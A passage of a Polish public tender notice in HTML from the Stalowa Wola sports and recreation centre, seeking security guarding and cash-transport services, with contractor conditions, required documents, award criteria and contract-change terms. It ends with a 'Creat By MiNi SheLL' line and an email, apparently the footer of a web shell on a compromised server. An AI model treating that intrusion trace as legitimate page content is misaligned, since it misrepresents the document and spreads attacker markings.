umownych zatrudnia  pracowników posiadających odpowiednie uprawnienia ochroniarskie, sprawnych psychofizycznie, niekaranych oraz dysponuje co najmniej: - jedną osobą posiadającą aktualną licencję II stopnia uprawniającą do organizowania i kierowania zespołami pracowników ochrony fizycznej - wydaną na podstawie rozdz. 5 Ustawy o ochronie osób i mienia. Osoba ta (Koordynator) będzie odpowiedzialna ze strony Wykonawcy za prawidłową realizację zamówienia,
- jednego pracownika  ochrony fizycznej ( 1 osoba - kryty basen ), - grupą konwojową , - dwoma grupami interwencyjnymi SUFO (Specjalistyczną Uzbrojoną Formacją Obronną), - posiada stała siedzibę w Stalowej Woli.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków na zasadzie spełnia / nie spełnia,
na podstawie oświadczeń i dokumentów załączonych w ofercie.
Warunek będzie spełniony jeżeli Wykonawca wykaże, iż   suma ubezpieczenia wynikająca z polisy lub innego dokumentu ubezpieczenia w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, nie będzie niższa niż 100.000,00 zł ponadto polisa będzie aktualna na okres wykonywania zadania, tj. co najmniej do końca  grudnia 2011r. albo ważność aktualnej polisy lub innego dokumentu ubezpieczenia kończyć się będzie po 30 grudnia 2010r., a Wykonawca złoży oświadczenie zgodnie ze wzorem stanowiącym załącznik nr 9 do niniejszej SIWZ, w którym zobowiąże się, że przed upływem terminu ważności aktualnej polisy lub innego dokumentu ubezpieczenia dostarczy Zamawiającemu polisę lub inny dokument ubezpieczenia potwierdzający kontynuowanie  przez Wykonawcę 
ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności na sumę ubezpieczenia nie niższą niż 100.000,00 zł i ważną co najmniej na okres wykonywania zadania tj. co najmniej do końca grudnia 2011r.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">dokumenty potwierdzające że usługi zostały wykonane należycie</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ofertę cenową - zał. nr 1; pelnomocnictwo (o ile dotyczy); kosztorys - zał. nr 4; ośw. dot. polisy - zał. nr 9; zaakceptowane wzory umów - zał. nr 10, 11, 12 i 13; oświadczenie - zał. nr 14.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art.144 ust.1 Ustawy przewiduje możliwość zmian w Umowie  na wykonanie zadania objętego postępowaniem znak MOSiR/10/2010:
A) zmianę terminu rozpoczęcia ochraniania obiektów i transportu wartości pieniężnych wynikających z niemożności zakończenia postępowania i podpisanie umowy przed końcem 2010r. Zmiany te spowodują zmianę daty rozpoczęcia świadczenia usług na dzień w którym będzie to możliwe (wynikający z procedury przetargowej- na dzień następny po dniu podpisania umowy), B)  zmianę ilości godzin pracy na pływalni odkrytej wynikających ze złej pogody - baseny będą nieczynne, C) zmianę ilości godzin pracy na pływalniach wynikających z decyzji sanepidu o nieotwieraniu lub zamknięciu basenów- baseny będą nieczynne,	 
D) zmianę ilości godzin pracy na pływalniach wynikających np. z działania siły wyższej, klęski żywiołowej - baseny będą nieczynne, E) zmianę terminu zakończenia ochraniania obiektów i transportu wartości pieniężnych  
wynikających z niemożności zakończenia nowego postępowania obejmującego usługi ochroniarskie na 2012r.i podpisanie umowy przed  końcem 2011r. Zmiany te spowodują zmianę daty zakończenia świadczenia bieżących usług do dnia podpisania umowy na usługi ochroniarskie na 2012r.- nie dłużej niż do końca I-szego kwartału 2012r. - oraz konieczność uzupełnienia ubezpieczenia (polisy OC)  na przedłużony okres. F) zmianę wartości wynagrodzenia określonego w umowie w przypadku: - zmian wymienionych w ppkt od A) do E), G) zmian obligatoryjnych wynikających ze zmian przepisów prawa, niezależnych od stron. H) zmianę osób wskazanych w ofercie Wykonawcy, wyłącznie za zgodą Zamawiającego wyrażoną w formie pisemnej, pod warunkiem posiadania przez te osoby, co najmniej takich samych uprawnień i kwalifikacji zawodowych jak wymagane przez przepisy prawa 
w tym zakresie (Wykonawca będzie zobowiązany dostarczyć Zamawiającemu kopię 
uprawnień pracowników ochrony, w celu uzyskania zgody). I) zmianę Koordynatorów z uwagi na chorobę, urlop, sytuacje losowe  itp. J) zmian nieistotnych, zgodnie z treścią art. 144 ust. 1 Ustawy, K) zmian na skutek zdarzenia niezależnego od Zamawiającego, np.: decyzji organu administracji, orzeczenia sądowego, bezpośrednio wpływającego na przedmiot zamówienia, w zakresie objętym decyzją lub orzeczeniem sądu, L) zmian danych teleadresowych, np.: siedziby firmy, adresu do korespondencji, numerów telefonów (stacjonarnych i komórkowych) wynikających z bieżących umów i potrzeb, M) w przypadku zmiany strukturalnych stron umowy, takich jak zmiana formy organizacyjno-prawnej Wykonawcy, zmiana firmy, pod która działa Wykonawca, zmiana osoby uprawnionej do składania oświadczeń w imieniu Wykonawcy, powodujących potrzebę wprowadzenia do treści umowy zmian neutralnych lub korzystnych dla Zamawiającego, w zakresie dokonanych zmian strukturalnych,N) możliwość dokonania każdej ze zmian, np.: w zakresie przedmiotu umowy, terminu 
wykonania przedmiotu umowy, w przypadku gdy z uwagi na liczne przeszkody 
spowodowane na skutek siły wyższej wykonanie umowy stało się niemożliwe. Przez siłę wyższą należy rozumieć zdarzenie zewnętrzne, wynikłe po podpisaniu umowy, którego nie można było przewidzieć, uniknąć ani jemu zapobiec przy zachowaniu wszelkich należytych środków, niezależnie od stron umowy. Zdarzeniami siły wyższej są między innymi takie zdarzenia jak: klęski żywiołowe, anomalie klimatyczne, upadki meteorytów, wojny, rewolucje, zamachy stanu, akty terrorystyczne, konfiskaty, nacjonalizacje i inne podobne decyzje władz państwowych.
 Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. Dokonanie zmian, o których mowa w ppktach A) - N) wymienionych powyżej, wymaga formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mosir.stalowawola.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Sportu i Rekreacji, 37-450 Stalowa Wola, ul. Hutnicza 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.12.2010 godzina 09:00, miejsce: Miejski Ośrodek Sportu i Rekreacji, 37-450 Stalowa Wola, ul. Hutnicza 15
sekretariat MOSiR - pokój nr 101, na I piętrze w budynku administracyjnym..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com